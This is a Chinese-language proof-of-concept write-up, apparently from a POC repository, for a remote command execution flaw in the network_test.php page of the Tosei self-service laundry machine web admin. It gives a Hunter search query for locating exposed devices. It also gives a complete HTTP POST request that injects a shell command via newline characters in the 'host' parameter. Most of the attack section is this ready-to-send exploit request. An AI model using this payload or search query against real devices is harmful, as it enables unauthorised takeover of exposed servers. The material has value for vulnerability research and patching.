POC/wpoc/Tosei/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md

46 lines
1.7 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# Tosei 自助洗衣机 web 管理端 network_test.php 文件 host 参数远程命令执行漏洞
# 一、漏洞简介
Tosei 自助洗衣机 是日本 Tosei 公司的一个产品。Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。
# 二、影响版本
+ Tosei 自助洗衣机 web 管理端
# 三、资产测绘
+ hunter`web.body="tosei_login_check.php"`
+ 特征
![1700496989279-62c782a3-21b7-48d2-9e04-6ed199d00499.png](./img/yJFddX_3R3th-rYw/1700496989279-62c782a3-21b7-48d2-9e04-6ed199d00499-769255.png)
# 四、漏洞复现
访问poc出现如下页面表示可能存在漏洞
```plain
/cgi-bin/network_test.php
```
![1700497024236-9303403b-bf49-4e18-a628-52f74865cf9e.png](./img/yJFddX_3R3th-rYw/1700497024236-9303403b-bf49-4e18-a628-52f74865cf9e-898026.png)
修改host参数为想要执行的命令
```plain
POST /cgi-bin/network_test.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1
host=%0aid%0a&command=ping
```
![1700497061931-b49ccd9b-f202-444d-a21e-0a9b40cc7c69.png](./img/yJFddX_3R3th-rYw/1700497061931-b49ccd9b-f202-444d-a21e-0a9b40cc7c69-543775.png)
> 更新: 2024-02-29 23:57:12
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bihozhmkgaeqymw2>